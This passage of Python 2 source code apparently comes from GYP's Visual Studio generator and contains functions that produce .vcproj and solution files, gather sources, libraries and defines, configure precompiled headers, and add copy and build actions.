if VALID_MSVS_GUID_CHARS.match(guid) is None:
raise ValueError('Invalid MSVS guid: "%s". Must match regex: "%s".' %
(guid, VALID_MSVS_GUID_CHARS.pattern))
guid = '{%s}' % guid
guid = guid or MSVSNew.MakeGuid(proj_path)
return guid
def _GetMsbuildToolsetOfProject(proj_path, spec, version):
"""Get the platform toolset for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
version: The MSVSVersion object.
Returns:
the platform toolset string or None.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
toolset = default_config.get('msbuild_toolset')
if not toolset and version.DefaultToolset():
toolset = version.DefaultToolset()
return toolset
def _GenerateProject(project, options, version, generator_flags):
"""Generates a vcproj file.
Arguments:
project: the MSVSProject object.
options: global generator options.
version: the MSVSVersion object.
generator_flags: dict of generator-specific flags.
Returns:
A list of source files that cannot be found on disk.
"""
default_config = _GetDefaultConfiguration(project.spec)
# Skip emitting anything if told to with msvs_existing_vcproj option.
if default_config.get('msvs_existing_vcproj'):
return []
if version.UsesVcxproj():
return _GenerateMSBuildProject(project, options, version, generator_flags)
else:
return _GenerateMSVSProject(project, options, version, generator_flags)
def _GenerateMSVSProject(project, options, version, generator_flags):
"""Generates a .vcproj file. It may create .rules and .user files too.
Arguments:
project: The project object we will generate the file for.
options: Global options passed to the generator.
version: The VisualStudioVersion object.
generator_flags: dict of generator-specific flags.
"""
spec = project.spec
gyp.common.EnsureDirExists(project.path)
platforms = _GetUniquePlatforms(spec)
p = MSVSProject.Writer(project.path, version, spec['target_name'],
project.guid, platforms)
# Get directory project file is in.
project_dir = os.path.split(project.path)[0]
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
config_type = _GetMSVSConfigurationType(spec, project.build_file)
for config_name, config in spec['configurations'].iteritems():
_AddConfigurationToMSVSProject(p, spec, config_type, config_name, config)
# Prepare list of sources and excluded sources.
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
gyp_file)
# Add rules.
actions_to_add = {}
_GenerateRulesForMSVS(p, project_dir, options, spec,
sources, excluded_sources,
actions_to_add)
list_excluded = generator_flags.get('msvs_list_excluded_files', True)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(
spec, options, project_dir, sources, excluded_sources, list_excluded))
# Add in files.
missing_sources = _VerifySourcesExist(sources, project_dir)
p.AddFiles(sources)
_AddToolFilesToMSVS(p, spec)
_HandlePreCompiledHeaders(p, sources, spec)
_AddActions(actions_to_add, spec, relative_path_of_gyp_file)
_AddCopies(actions_to_add, spec)
_WriteMSVSUserFile(project.path, version, spec)
# NOTE: this stanza must appear after all actions have been decided.
  # Don't exclude sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
_ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
list_excluded)
_AddAccumulatedActionsToMSVS(p, spec, actions_to_add)
# Write it out.
p.WriteIfChanged()
return missing_sources
def _GetUniquePlatforms(spec):
"""Returns the list of unique platforms for this spec, e.g ['win32', ...].
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
# Gather list of unique platforms.
platforms = OrderedSet()
for configuration in spec['configurations']:
platforms.add(_ConfigPlatform(spec['configurations'][configuration]))
platforms = list(platforms)
return platforms
def _CreateMSVSUserFile(proj_path, version, spec):
"""Generates a .user file for the user running this Gyp program.
Arguments:
proj_path: The path of the project file being created. The .user file
shares the same path (with an appropriate suffix).
version: The VisualStudioVersion object.
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
(domain, username) = _GetDomainAndUserName()
vcuser_filename = '.'.join([proj_path, domain, username, 'user'])
user_file = MSVSUserFile.Writer(vcuser_filename, version,
spec['target_name'])
return user_file
def _GetMSVSConfigurationType(spec, build_file):
"""Returns the configuration type for this project.
It's a number defined by Microsoft. May raise an exception.
Args:
spec: The target dictionary containing the properties of the target.
build_file: The path of the gyp file.
Returns:
An integer, the configuration type.
"""
try:
config_type = {
'executable': '1', # .exe
'shared_library': '2', # .dll
'loadable_module': '2', # .dll
'static_library': '4', # .lib
'none': '10', # Utility type
}[spec['type']]
except KeyError:
if spec.get('type'):
raise GypError('Target type %s is not a valid target type for '
'target %s in %s.' %
(spec['type'], spec['target_name'], build_file))
else:
raise GypError('Missing type field for target %s in %s.' %
(spec['target_name'], build_file))
return config_type
def _AddConfigurationToMSVSProject(p, spec, config_type, config_name, config):
"""Adds a configuration to the MSVS project.
  Many settings in a vcproj file are specific to a configuration. This
  function adds the configuration-specific part of the vcproj file.
Arguments:
p: The target project being generated.
spec: The target dictionary containing the properties of the target.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
config: The dictionary that defines the special processing to be done
for this configuration.
"""
# Get the information for this configuration
include_dirs, resource_include_dirs = _GetIncludeDirs(config)
libraries = _GetLibraries(spec)
library_dirs = _GetLibraryDirs(config)
out_file, vc_tool, _ = _GetOutputFilePathAndTool(spec, msbuild=False)
defines = _GetDefines(config)
defines = [_EscapeCppDefineForMSVS(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(config)
prebuild = config.get('msvs_prebuild')
postbuild = config.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = config.get('msvs_precompiled_header')
# Prepare the list of tools as a dictionary.
tools = dict()
# Add in user specified msvs_settings.
msvs_settings = config.get('msvs_settings', {})
MSVSSettings.ValidateMSVSSettings(msvs_settings)
# Prevent default library inheritance from the environment.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', ['$(NOINHERIT)'])
for tool in msvs_settings:
settings = config['msvs_settings'][tool]
for setting in settings:
_ToolAppend(tools, tool, setting, settings[setting])
# Add the information to the appropriate tool
_ToolAppend(tools, 'VCCLCompilerTool',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(tools, 'VCResourceCompilerTool',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', libraries)
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalLibraryDirectories',
library_dirs)
if out_file:
_ToolAppend(tools, vc_tool, 'OutputFile', out_file, only_if_unset=True)
# Add defines.
_ToolAppend(tools, 'VCCLCompilerTool', 'PreprocessorDefinitions', defines)
_ToolAppend(tools, 'VCResourceCompilerTool', 'PreprocessorDefinitions',
defines)
# Change program database directory to prevent collisions.
_ToolAppend(tools, 'VCCLCompilerTool', 'ProgramDataBaseFileName',
'$(IntDir)$(ProjectName)\\vc80.pdb', only_if_unset=True)
# Add disabled warnings.
_ToolAppend(tools, 'VCCLCompilerTool',
'DisableSpecificWarnings', disabled_warnings)
# Add Pre-build.
_ToolAppend(tools, 'VCPreBuildEventTool', 'CommandLine', prebuild)
# Add Post-build.
_ToolAppend(tools, 'VCPostBuildEventTool', 'CommandLine', postbuild)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(tools, 'VCCLCompilerTool', 'UsePrecompiledHeader', '2')
_ToolAppend(tools, 'VCCLCompilerTool',
'PrecompiledHeaderThrough', precompiled_header)
_ToolAppend(tools, 'VCCLCompilerTool',
'ForcedIncludeFiles', precompiled_header)
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(tools, 'VCLinkerTool', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(tools, 'VCLinkerTool', 'ModuleDefinitionFile', def_file)
_AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name)
def _GetIncludeDirs(config):
"""Returns the list of directories to be used for #include directives.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
# TODO(bradnelson): include_dirs should really be flexible enough not to
# require this sort of thing.
include_dirs = (
config.get('include_dirs', []) +
config.get('msvs_system_include_dirs', []))
resource_include_dirs = config.get('resource_include_dirs', include_dirs)
include_dirs = _FixPaths(include_dirs)
resource_include_dirs = _FixPaths(resource_include_dirs)
return include_dirs, resource_include_dirs
def _GetLibraryDirs(config):
"""Returns the list of directories to be used for library search paths.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
library_dirs = config.get('library_dirs', [])
library_dirs = _FixPaths(library_dirs)
return library_dirs
def _GetLibraries(spec):
"""Returns the list of libraries for this configuration.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The list of directory paths.
"""
libraries = spec.get('libraries', [])
# Strip out -l, as it is not used on windows (but is needed so we can pass
# in libraries that are assumed to be in the default library path).
# Also remove duplicate entries, leaving only the last duplicate, while
# preserving order.
found = OrderedSet()
unique_libraries_list = []
for entry in reversed(libraries):
library = re.sub('^\-l', '', entry)
if not os.path.splitext(library)[1]:
library += '.lib'
if library not in found:
found.add(library)
unique_libraries_list.append(library)
unique_libraries_list.reverse()
return unique_libraries_list
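# Illustrative example (a sketch with hypothetical library names): '-l' is
# stripped, a missing extension becomes '.lib', and only the last duplicate
# is kept.
#
#   >>> _GetLibraries({'libraries': ['-luser32', 'kernel32.lib', 'user32.lib']})
#   ['kernel32.lib', 'user32.lib']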
def _GetOutputFilePathAndTool(spec, msbuild):
"""Returns the path and tool to use for this target.
Figures out the path of the file this spec will create and the name of
the VC tool that will create it.
Arguments:
    spec: The target dictionary containing the properties of the target.
    msbuild: True when generating for MSBuild (vcxproj) rather than the
        older vcproj format.
Returns:
A triple of (file path, name of the vc tool, name of the msbuild tool)
"""
# Select a name for the output file.
out_file = ''
vc_tool = ''
msbuild_tool = ''
output_file_map = {
'executable': ('VCLinkerTool', 'Link', '$(OutDir)', '.exe'),
'shared_library': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'loadable_module': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'static_library': ('VCLibrarianTool', 'Lib', '$(OutDir)lib\\', '.lib'),
}
output_file_props = output_file_map.get(spec['type'])
if output_file_props and int(spec.get('msvs_auto_output_file', 1)):
vc_tool, msbuild_tool, out_dir, suffix = output_file_props
if spec.get('standalone_static_library', 0):
out_dir = '$(OutDir)'
out_dir = spec.get('product_dir', out_dir)
product_extension = spec.get('product_extension')
if product_extension:
suffix = '.' + product_extension
elif msbuild:
suffix = '$(TargetExt)'
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
out_file = ntpath.join(out_dir, prefix + product_name + suffix)
return out_file, vc_tool, msbuild_tool
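# Illustrative example (a sketch; a minimal hypothetical spec):
#
#   >>> _GetOutputFilePathAndTool({'type': 'executable'}, msbuild=False)
#   ('$(OutDir)\\$(ProjectName).exe', 'VCLinkerTool', 'Link')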
def _GetOutputTargetExt(spec):
"""Returns the extension for this target, including the dot
If product_extension is specified, set target_extension to this to avoid
MSB8012, returns None otherwise. Ignores any target_extension settings in
the input files.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A string with the extension, or None
"""
target_extension = spec.get('product_extension')
if target_extension:
return '.' + target_extension
return None
def _GetDefines(config):
"""Returns the list of preprocessor definitions for this configuation.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of preprocessor definitions.
"""
defines = []
for d in config.get('defines', []):
if type(d) == list:
fd = '='.join([str(dpart) for dpart in d])
else:
fd = str(d)
defines.append(fd)
return defines
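# Illustrative example (a sketch; a 'defines' list may mix plain names and
# [name, value] pairs):
#
#   >>> _GetDefines({'defines': ['NDEBUG', ['FOO', 42]]})
#   ['NDEBUG', 'FOO=42']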
def _GetDisabledWarnings(config):
return [str(i) for i in config.get('msvs_disabled_warnings', [])]
def _GetModuleDefinition(spec):
def_file = ''
if spec['type'] in ['shared_library', 'loadable_module', 'executable']:
def_files = [s for s in spec.get('sources', []) if s.endswith('.def')]
if len(def_files) == 1:
def_file = _FixPath(def_files[0])
elif def_files:
raise ValueError(
'Multiple module definition files in one target, target %s lists '
'multiple .def files: %s' % (
spec['target_name'], ' '.join(def_files)))
return def_file
def _ConvertToolsToExpectedForm(tools):
"""Convert tools to a form expected by Visual Studio.
Arguments:
tools: A dictionary of settings; the tool name is the key.
Returns:
A list of Tool objects.
"""
tool_list = []
for tool, settings in tools.iteritems():
# Collapse settings with lists.
settings_fixed = {}
for setting, value in settings.iteritems():
if type(value) == list:
if ((tool == 'VCLinkerTool' and
setting == 'AdditionalDependencies') or
setting == 'AdditionalOptions'):
settings_fixed[setting] = ' '.join(value)
else:
settings_fixed[setting] = ';'.join(value)
else:
settings_fixed[setting] = value
# Add in this tool.
tool_list.append(MSVSProject.Tool(tool, settings_fixed))
return tool_list
def _AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name):
"""Add to the project file the configuration specified by config.
Arguments:
p: The target project being generated.
spec: the target project dict.
tools: A dictionary of settings; the tool name is the key.
config: The dictionary that defines the special processing to be done
for this configuration.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
"""
attributes = _GetMSVSAttributes(spec, config, config_type)
# Add in this configuration.
tool_list = _ConvertToolsToExpectedForm(tools)
p.AddConfig(_ConfigFullName(config_name, config),
attrs=attributes, tools=tool_list)
def _GetMSVSAttributes(spec, config, config_type):
# Prepare configuration attributes.
prepared_attrs = {}
source_attrs = config.get('msvs_configuration_attributes', {})
for a in source_attrs:
prepared_attrs[a] = source_attrs[a]
# Add props files.
vsprops_dirs = config.get('msvs_props', [])
vsprops_dirs = _FixPaths(vsprops_dirs)
if vsprops_dirs:
prepared_attrs['InheritedPropertySheets'] = ';'.join(vsprops_dirs)
# Set configuration type.
prepared_attrs['ConfigurationType'] = config_type
output_dir = prepared_attrs.get('OutputDirectory',
'$(SolutionDir)$(ConfigurationName)')
prepared_attrs['OutputDirectory'] = _FixPath(output_dir) + '\\'
if 'IntermediateDirectory' not in prepared_attrs:
intermediate = '$(ConfigurationName)\\obj\\$(ProjectName)'
prepared_attrs['IntermediateDirectory'] = _FixPath(intermediate) + '\\'
else:
intermediate = _FixPath(prepared_attrs['IntermediateDirectory']) + '\\'
intermediate = MSVSSettings.FixVCMacroSlashes(intermediate)
prepared_attrs['IntermediateDirectory'] = intermediate
return prepared_attrs
def _AddNormalizedSources(sources_set, sources_array):
sources_set.update(_NormalizedSource(s) for s in sources_array)
def _PrepareListOfSources(spec, generator_flags, gyp_file):
"""Prepare list of sources and excluded sources.
Besides the sources specified directly in the spec, adds the gyp file so
that a change to it will cause a re-compile. Also adds appropriate sources
for actions and copies. Assumes later stage will un-exclude files which
have custom build steps attached.
Arguments:
spec: The target dictionary containing the properties of the target.
    generator_flags: Dict of generator-specific flags.
    gyp_file: The name of the gyp file.
Returns:
A pair of (list of sources, list of excluded sources).
The sources will be relative to the gyp file.
"""
sources = OrderedSet()
_AddNormalizedSources(sources, spec.get('sources', []))
excluded_sources = OrderedSet()
# Add in the gyp file.
if not generator_flags.get('standalone'):
sources.add(gyp_file)
# Add in 'action' inputs and outputs.
for a in spec.get('actions', []):
inputs = a['inputs']
inputs = [_NormalizedSource(i) for i in inputs]
# Add all inputs to sources and excluded sources.
inputs = OrderedSet(inputs)
sources.update(inputs)
if not spec.get('msvs_external_builder'):
excluded_sources.update(inputs)
if int(a.get('process_outputs_as_sources', False)):
_AddNormalizedSources(sources, a.get('outputs', []))
# Add in 'copies' inputs and outputs.
for cpy in spec.get('copies', []):
_AddNormalizedSources(sources, cpy.get('files', []))
return (sources, excluded_sources)
def _AdjustSourcesAndConvertToFilterHierarchy(
spec, options, gyp_dir, sources, excluded_sources, list_excluded):
"""Adjusts the list of sources and excluded sources.
Also converts the sets to lists.
Arguments:
spec: The target dictionary containing the properties of the target.
options: Global generator options.
    gyp_dir: The directory of the gyp/project file being processed.
sources: A set of sources to be included for this project.
excluded_sources: A set of sources to be excluded for this project.
Returns:
A trio of (list of sources, list of excluded sources,
path of excluded IDL file)
"""
# Exclude excluded sources coming into the generator.
excluded_sources.update(OrderedSet(spec.get('sources_excluded', [])))
# Add excluded sources into sources for good measure.
sources.update(excluded_sources)
# Convert to proper windows form.
# NOTE: sources goes from being a set to a list here.
# NOTE: excluded_sources goes from being a set to a list here.
sources = _FixPaths(sources)
# Convert to proper windows form.
excluded_sources = _FixPaths(excluded_sources)
excluded_idl = _IdlFilesHandledNonNatively(spec, sources)
precompiled_related = _GetPrecompileRelatedFiles(spec)
# Find the excluded ones, minus the precompiled header related ones.
fully_excluded = [i for i in excluded_sources if i not in precompiled_related]
# Convert to folders and the right slashes.
sources = [i.split('\\') for i in sources]
sources = _ConvertSourcesToFilterHierarchy(sources, excluded=fully_excluded,
list_excluded=list_excluded)
# Prune filters with a single child to flatten ugly directory structures
# such as ../../src/modules/module1 etc.
while len(sources) == 1 and isinstance(sources[0], MSVSProject.Filter):
sources = sources[0].contents
return sources, excluded_sources, excluded_idl
def _IdlFilesHandledNonNatively(spec, sources):
# If any non-native rules use 'idl' as an extension exclude idl files.
# Gather a list here to use later.
using_idl = False
for rule in spec.get('rules', []):
if rule['extension'] == 'idl' and int(rule.get('msvs_external_rule', 0)):
using_idl = True
break
if using_idl:
excluded_idl = [i for i in sources if i.endswith('.idl')]
else:
excluded_idl = []
return excluded_idl
def _GetPrecompileRelatedFiles(spec):
# Gather a list of precompiled header related sources.
precompiled_related = []
for _, config in spec['configurations'].iteritems():
for k in precomp_keys:
f = config.get(k)
if f:
precompiled_related.append(_FixPath(f))
return precompiled_related
def _ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
list_excluded):
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
for file_name, excluded_configs in exclusions.iteritems():
if (not list_excluded and
len(excluded_configs) == len(spec['configurations'])):
# If we're not listing excluded files, then they won't appear in the
# project, so don't try to configure them to be excluded.
pass
else:
for config_name, config in excluded_configs:
p.AddFileConfig(file_name, _ConfigFullName(config_name, config),
{'ExcludedFromBuild': 'true'})
def _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl):
exclusions = {}
# Exclude excluded sources from being built.
for f in excluded_sources:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
precomped = [_FixPath(config.get(i, '')) for i in precomp_keys]
# Don't do this for ones that are precompiled header related.
if f not in precomped:
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
# If any non-native rules use 'idl' as an extension exclude idl files.
# Exclude them now.
for f in excluded_idl:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
return exclusions
def _AddToolFilesToMSVS(p, spec):
# Add in tool files (rules).
tool_files = OrderedSet()
for _, config in spec['configurations'].iteritems():
for f in config.get('msvs_tool_files', []):
tool_files.add(f)
for f in tool_files:
p.AddToolFile(f)
def _HandlePreCompiledHeaders(p, sources, spec):
# Pre-compiled header source stubs need a different compiler flag
# (generate precompiled header) and any source file not of the same
# kind (i.e. C vs. C++) as the precompiled header source stub needs
# to have use of precompiled headers disabled.
extensions_excluded_from_precompile = []
for config_name, config in spec['configurations'].iteritems():
source = config.get('msvs_precompiled_source')
if source:
source = _FixPath(source)
      # UsePrecompiledHeader=1: this stub source creates the precompiled header.
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '1'})
p.AddFileConfig(source, _ConfigFullName(config_name, config),
{}, tools=[tool])
basename, extension = os.path.splitext(source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
def DisableForSourceTree(source_tree):
for source in source_tree:
if isinstance(source, MSVSProject.Filter):
DisableForSourceTree(source.contents)
else:
basename, extension = os.path.splitext(source)
if extension in extensions_excluded_from_precompile:
for config_name, config in spec['configurations'].iteritems():
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '0',
'ForcedIncludeFiles': '$(NOINHERIT)'})
p.AddFileConfig(_FixPath(source),
_ConfigFullName(config_name, config),
{}, tools=[tool])
# Do nothing if there was no precompiled source.
if extensions_excluded_from_precompile:
DisableForSourceTree(sources)
def _AddActions(actions_to_add, spec, relative_path_of_gyp_file):
# Add actions.
actions = spec.get('actions', [])
# Don't setup_env every time. When all the actions are run together in one
# batch file in VS, the PATH will grow too long.
# Membership in this set means that the cygwin environment has been set up,
# and does not need to be set up again.
have_setup_env = set()
for a in actions:
# Attach actions to the gyp file if nothing else is there.
inputs = a.get('inputs') or [relative_path_of_gyp_file]
attached_to = inputs[0]
need_setup_env = attached_to not in have_setup_env
cmd = _BuildCommandLineForRule(spec, a, has_input_path=False,
do_setup_env=need_setup_env)
have_setup_env.add(attached_to)
# Add the action.
_AddActionStep(actions_to_add,
inputs=inputs,
outputs=a.get('outputs', []),
description=a.get('message', a['action_name']),
command=cmd)
def _WriteMSVSUserFile(project_path, version, spec):
# Add run_as and test targets.
if 'run_as' in spec:
run_as = spec['run_as']
action = run_as.get('action', [])
environment = run_as.get('environment', [])
working_directory = run_as.get('working_directory', '.')
elif int(spec.get('test', 0)):
action = ['$(TargetPath)', '--gtest_print_time']
environment = []
working_directory = '.'
else:
return # Nothing to add
# Write out the user file.
user_file = _CreateMSVSUserFile(project_path, version, spec)
for config_name, c_data in spec['configurations'].iteritems():
user_file.AddDebugSettings(_ConfigFullName(config_name, c_data),
action, environment, working_directory)
user_file.WriteIfChanged()
def _AddCopies(actions_to_add, spec):
copies = _GetCopies(spec)
for inputs, outputs, cmd, description in copies:
_AddActionStep(actions_to_add, inputs=inputs, outputs=outputs,
description=description, command=cmd)
def _GetCopies(spec):
copies = []
# Add copies.
for cpy in spec.get('copies', []):
for src in cpy.get('files', []):
dst = os.path.join(cpy['destination'], os.path.basename(src))
# _AddCustomBuildToolForMSVS() will call _FixPath() on the inputs and
# outputs, so do the same for our generated command line.
if src.endswith('/'):
src_bare = src[:-1]
base_dir = posixpath.split(src_bare)[0]
outer_dir = posixpath.split(src_bare)[1]
cmd = 'cd "%s" && xcopy /e /f /y "%s" "%s\\%s\\"' % (
_FixPath(base_dir), outer_dir, _FixPath(dst), outer_dir)
copies.append(([src], ['dummy_copies', dst], cmd,
'Copying %s to %s' % (src, dst)))
else:
cmd = 'mkdir "%s" 2>nul & set ERRORLEVEL=0 & copy /Y "%s" "%s"' % (
_FixPath(cpy['destination']), _FixPath(src), _FixPath(dst))
copies.append(([src], [dst], cmd, 'Copying %s to %s' % (src, dst)))
return copies
def _GetPathDict(root, path):
# |path| will eventually be empty (in the recursive calls) if it was initially
# relative; otherwise it will eventually end up as '\', 'D:\', etc.
if not path or path.endswith(os.sep):
return root
parent, folder = os.path.split(path)
parent_dict = _GetPathDict(root, parent)
if folder not in parent_dict:
parent_dict[folder] = dict()
return parent_dict[folder]
def _DictsToFolders(base_path, bucket, flat):
# Convert to folders recursively.
children = []
for folder, contents in bucket.iteritems():
if type(contents) == dict:
folder_children = _DictsToFolders(os.path.join(base_path, folder),
contents, flat)
if flat:
children += folder_children
else:
folder_children = MSVSNew.MSVSFolder(os.path.join(base_path, folder),
name='(' + folder + ')',
entries=folder_children)
children.append(folder_children)
else:
children.append(contents)
return children
def _CollapseSingles(parent, node):
  # Recursively explore the tree of dicts looking for projects which are
# the sole item in a folder which has the same name as the project. Bring
# such projects up one level.
if (type(node) == dict and
len(node) == 1 and
node.keys()[0] == parent + '.vcproj'):
return node[node.keys()[0]]
if type(node) != dict:
return node
for child in node:
node[child] = _CollapseSingles(child, node[child])
return node
def _GatherSolutionFolders(sln_projects, project_objects, flat):
root = {}
# Convert into a tree of dicts on path.
for p in sln_projects:
gyp_file, target = gyp.common.ParseQualifiedTarget(p)[0:2]
gyp_dir = os.path.dirname(gyp_file)
path_dict = _GetPathDict(root, gyp_dir)
path_dict[target + '.vcproj'] = project_objects[p]
# Walk down from the top until we hit a folder that has more than one entry.
# In practice, this strips the top-level "src/" dir from the hierarchy in
# the solution.
while len(root) == 1 and type(root[root.keys()[0]]) == dict:
root = root[root.keys()[0]]
# Collapse singles.
root = _CollapseSingles('', root)
# Merge buckets until everything is a root entry.
return _DictsToFolders('', root, flat)
def _GetPathOfProject(qualified_target, spec, options, msvs_version):
default_config = _GetDefaultConfiguration(spec)
proj_filename = default_config.get('msvs_existing_vcproj')
if not proj_filename:
proj_filename = (spec['target_name'] + options.suffix +
msvs_version.ProjectExtension())
build_file = gyp.common.BuildFile(qualified_target)
proj_path = os.path.join(os.path.dirname(build_file), proj_filename)
fix_prefix = None
if options.generator_output:
project_dir_path = os.path.dirname(os.path.abspath(proj_path))
proj_path = os.path.join(options.generator_output, proj_path)
fix_prefix = gyp.common.RelativePath(project_dir_path,
os.path.dirname(proj_path))
return proj_path, fix_prefix
def _GetPlatformOverridesOfProject(spec):
# Prepare a dict indicating which project configurations are used for which
# solution configurations for this target.
config_platform_overrides = {}
for config_name, c in spec['configurations'].iteritems():
config_fullname = _ConfigFullName(config_name, c)
platform = c.get('msvs_target_platform', _ConfigPlatform(c))
fixed_config_fullname = '%s|%s' % (
_ConfigBaseName(config_name, _ConfigPlatform(c)), platform)
config_platform_overrides[config_fullname] = fixed_config_fullname
return config_platform_overrides
def _CreateProjectObjects(target_list, target_dicts, options, msvs_version):
"""Create a MSVSProject object for the targets found in target list.
Arguments:
target_list: the list of targets to generate project objects for.
target_dicts: the dictionary of specifications.
options: global generator options.
msvs_version: the MSVSVersion object.
Returns:
A set of created projects, keyed by target.
"""
global fixpath_prefix
# Generate each project.
projects = {}
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec['toolset'] != 'target':
raise GypError(
'Multiple toolsets not supported in msvs build (target %s)' %
qualified_target)
proj_path, fixpath_prefix = _GetPathOfProject(qualified_target, spec,
options, msvs_version)
guid = _GetGuidOfProject(proj_path, spec)
overrides = _GetPlatformOverridesOfProject(spec)
build_file = gyp.common.BuildFile(qualified_target)
# Create object for this project.
obj = MSVSNew.MSVSProject(
proj_path,
name=spec['target_name'],
guid=guid,
spec=spec,
build_file=build_file,
config_platform_overrides=overrides,
fixpath_prefix=fixpath_prefix)
    # Set project toolset if any (MSBuild only).
if msvs_version.UsesVcxproj():
obj.set_msbuild_toolset(
_GetMsbuildToolsetOfProject(proj_path, spec, msvs_version))
projects[qualified_target] = obj
# Set all the dependencies, but not if we are using an external builder like
# ninja
for project in projects.values():
if not project.spec.get('msvs_external_builder'):
deps = project.spec.get('dependencies', [])
deps = [projects[d] for d in deps]
project.set_dependencies(deps)
return projects
def _InitNinjaFlavor(options, target_list, target_dicts):
"""Initialize targets for the ninja flavor.
This sets up the necessary variables in the targets to generate msvs projects
that use ninja as an external builder. The variables in the spec are only set
if they have not been set. This allows individual specs to override the
default values initialized here.
Arguments:
options: Options provided to the generator.
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
"""
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec.get('msvs_external_builder'):
# The spec explicitly defined an external builder, so don't change it.
continue
path_to_ninja = spec.get('msvs_path_to_ninja', 'ninja.exe')
spec['msvs_external_builder'] = 'ninja'
if not spec.get('msvs_external_builder_out_dir'):
spec['msvs_external_builder_out_dir'] = \
options.depth + '/out/$(Configuration)'
if not spec.get('msvs_external_builder_build_cmd'):
spec['msvs_external_builder_build_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'$(ProjectName)',
]
if not spec.get('msvs_external_builder_clean_cmd'):
spec['msvs_external_builder_clean_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'-t',
'clean',
'$(ProjectName)',
]
def CalculateVariables(default_variables, params):
"""Generated variables that require params to be known."""
generator_flags = params.get('generator_flags', {})
# Select project file format version (if unset, default to auto detecting).
msvs_version = MSVSVersion.SelectVisualStudioVersion(
generator_flags.get('msvs_version', 'auto'))
# Stash msvs_version for later (so we don't have to probe the system twice).
params['msvs_version'] = msvs_version
# Set a variable so conditions can be based on msvs_version.
default_variables['MSVS_VERSION'] = msvs_version.ShortName()
# To determine processor word size on Windows, in addition to checking
# PROCESSOR_ARCHITECTURE (which reflects the word size of the current
  # process), it is also necessary to check PROCESSOR_ARCHITEW6432 (which
  # contains the actual word size of the system when running through WOW64).
if (os.environ.get('PROCESSOR_ARCHITECTURE', '').find('64') >= 0 or
os.environ.get('PROCESSOR_ARCHITEW6432', '').find('64') >= 0):
default_variables['MSVS_OS_BITS'] = 64
else:
default_variables['MSVS_OS_BITS'] = 32
if gyp.common.GetFlavor(params) == 'ninja':
default_variables['SHARED_INTERMEDIATE_DIR'] = '$(OutDir)gen'
def PerformBuild(data, configurations, params):
options = params['options']
msvs_version = params['msvs_version']
devenv = os.path.join(msvs_version.path, 'Common7', 'IDE', 'devenv.com')
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
sln_path = build_file_root + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
for config in configurations:
arguments = [devenv, sln_path, '/Build', config]
print 'Building [%s]: %s' % (config, arguments)
rtn = subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
"""Generate .sln and .vcproj files.
This is the entry point for this generator.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
data: Dictionary containing per .gyp data.
"""
global fixpath_prefix
options = params['options']
  # Get the project file format version back out of where we stashed it in
  # CalculateVariables.
msvs_version = params['msvs_version']
generator_flags = params.get('generator_flags', {})
# Optionally shard targets marked with 'msvs_shard': SHARD_COUNT.
